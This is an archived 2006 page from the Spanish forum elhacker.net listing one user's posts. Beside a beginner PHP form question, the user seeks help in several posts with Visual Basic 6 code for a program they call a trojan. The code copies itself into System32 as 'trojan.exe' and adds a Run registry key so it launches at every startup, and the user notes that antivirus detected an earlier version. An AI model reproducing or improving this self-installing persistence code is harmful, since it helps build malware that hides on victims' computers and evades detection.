elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 [126] 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 ... 147
1251  Programación / PHP / Re: Conectar For, con caja y botón. en: 11 Diciembre 2006, 07:04 am
jaja todos tenemos fallos  ;D ;D

Funciona a la perfección muchas gracias por tu ayuda ^^.

Saludos
1252  Programación / PHP / Re: Conectar For, con caja y botón. en: 10 Diciembre 2006, 22:41 pm
O_o Tiene varias cosas que desconozco así que no sabría modificarlo para hacer que funcione bien, ya que si pongo ese código y pongo cualquier número, como por ejemplo, 2 y me pone debajo de la caja: Linea 0

Bueno Saludos
1253  Programación / PHP / Conectar For, con caja y botón. en: 10 Diciembre 2006, 17:51 pm
Bueno, lo que quiero hacer es, principalmente, una caja de tamaño standar y un botón (supongo que en HTML) y todo el resto vacio.

Cuando meto un numero y le doy a aceptar que salga un numero de lineas igual al número que se ha metido con un texto, por ejemplo, el de Linea, y quedaría así:
(aqui esta la caja, en donde meto un numero) (aquí está el botón)
//Introduzco el número 7 y pulso el botón
//Y aparece debajo:
Linea 1
Linea 2
Linea 3
Linea 4
Linea 5
Linea 6
Linea 7

Hasta ahora llevo esto:
Código:
<html>
<head>
   <title>Lol</title>
</head>

<body>

<input type="text" name="lol">
<input type="submit" name="asd" value="Aceptar"><br>
<?php
   
   for($i=0;$i<=15;$i++)
   {
      echo "Linea ".$i."<br>";
   }
?>

</body>
</html>

Lo que me falta es conectarlo, que no tengo ni idea.

Saludos
1254  Programación / Programación Visual Basic / Re: ¿Cómo crear un lenguaje de programación? en: 10 Diciembre 2006, 17:04 pm
lol, xD, si ya es complicadillo aprender uno, imagínate programarlo, aunque estaría bien un lenguaje de programación en castellano, que somos los terceros por detras del ingles y del chino que más se habla en el mundo =(
1255  Programación / Programación Visual Basic / Re: Cuando se ejecute, que se copie a system32 en: 10 Diciembre 2006, 14:15 pm
Aaaaaa!!!

Claro ahora entiendo el problema.

Lo acabo de entender modificando tu código así:
Código:
Private Sub Form_Load()
If Dir("C:\windows\system32\troyano.exe") <> "" Then
        MsgBox "El archivo existe"
        'Como ya existe no hace falta q lo copies ni lo añadas al registro
    Else
        FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\troyano.exe"
        'Como no existe lo copias y lo añades al registro
    End If
End Sub

Claro, al principio todo funciona bien, pero si lo abro desde system32 logicamente no funciona porque se supone que se quiere volver a copiar ahí.

Entonces, lo que necesito, es esto??:

Un form, que al abrirlo se copie a sys32 (y al registro) y cuando se haya copiado, que se deshabilite la opción esa que tiene de copiarse a system32 para que solo lo haga la primera vez, y las demás no.

Entonces, que os parece este código??:

Private Sub Form_Load()
If Dir("C:\windows\system32\troyano.exe") <> "" Then
        ******
    Else
        FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\troyano.exe"
        ;;;;;;;;
    End If
End Sub

***** = Código, por ejemplo, para reiniciar el ordenador (cual es?? :S(por no abrir otro post))
;;;;;;; = Código, para copiar en el registro.

Ahora tengo una pregunta con los IF y los ELSE.

En el código, por ejemplo, en donde va el *****, puedo poner un código muy muy grande?? Algo así como 50 líneas...

Gracias Saludos
1256  Programación / Programación Visual Basic / Re: Form semi-transparente en el q se vean los controles??? en: 9 Diciembre 2006, 23:45 pm
Cierto cierto... :) :P
1257  Programación / Programación Visual Basic / Re: Cuando se ejecute, que se copie a system32 en: 9 Diciembre 2006, 23:44 pm
Bueno acabo de probar este ultimo codigo que me dices sp26 y obtengo los mismos resultados que los demás, me sale el error ese.

Pero he probado lo que dices, E0N con los dos tipos de troyanos (el que necesita modulo y el que me acaba de decir sp26) y es verdad, cuando los saco me funciona...

Pero lógicamente, me tiene que funcionar dentro del system32, no?

Porque lo que deseo es eso, que se copie al registro (que ya tengo el codigo y que funciona) y que se meta en system32.

Entonces, he de hacer algo, o se supone que me funciona así?

Bueno aquí dejo el código "entero"

Código:
Private Sub Form_Load()
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "trojan", "C:\Windows\System32\trojan.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\trojan.exe"
End Sub

Repito, aunque me funcione dentro del escritorio, se supone que me tiene que funcionar dentro de system32.
¿Que hago :S?

Saludos, y Gracias
1258  Foros Generales / Foro Libre / Re: Cumpleaños en: 9 Diciembre 2006, 19:51 pm
Ya estais los tres agostos actualizados
1259  Programación / Programación Visual Basic / Re: Cuando se ejecute, que se copie a system32 en: 9 Diciembre 2006, 17:11 pm
Bueno haber que me estoy liando :S, aquí está todo lo que tengo que me habeis dicho..

Modulo:
Código:
Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Function System32() As String
    Dim buf As String
    Dim ret As Long
    buf = String$(260, Chr$(0))
    ret = GetSystemDirectory(buf, Len(buf))
    System32 = Left$(buf, ret)
End Function
El formulario:
Código:
Private Sub Form_load()
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\trojan.exe"
End Sub

Si lo dejo así, y le doy a ejecutar, no rula, y si le doy al boton que me aparece de depurar, me indica que el error, es la linea del filecopy...

Si lo compilo se compila..., pero cuando tengo el ***.exe, lo ejecuto con normalidad, bien, pero lo que pasa es que se copia mal.

Porque cuando ejecuto el que se ha copiado a system32, me dice que hay un error 70... ese que os he dicho... bien.

Ahora cambio, el private form load, por lo de private timer1_timer..., hago lo mismo que en el anterior..

Y cuando llego a la parte de ir a system32 a ver si se me ha copiado bien noto una minúscula diferencia, y es que me abre el form, pero me sigue tirando el error y me lo cierra.

=S

De hecho, me acuerdo que hace tiempo lo conseguí, y no tube que crear módulo ni nada, pero eso si, el maldito kav me lo detectaba porque añadia una clave al registro.

Bueno sigo necesitando ayuda Saludos y gracias
1260  Programación / Programación Visual Basic / Re: Cuando se ejecute, que se copie a system32 en: 9 Diciembre 2006, 13:09 pm
Bueno, tambien acabo de probar el código que me dices E0N y me dice el mismo problema ese 70 de tiempo de ejecucion acceso denegado.

 :-( :-(

Saludos
Páginas: 1 ... 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 [126] 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 ... 147
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines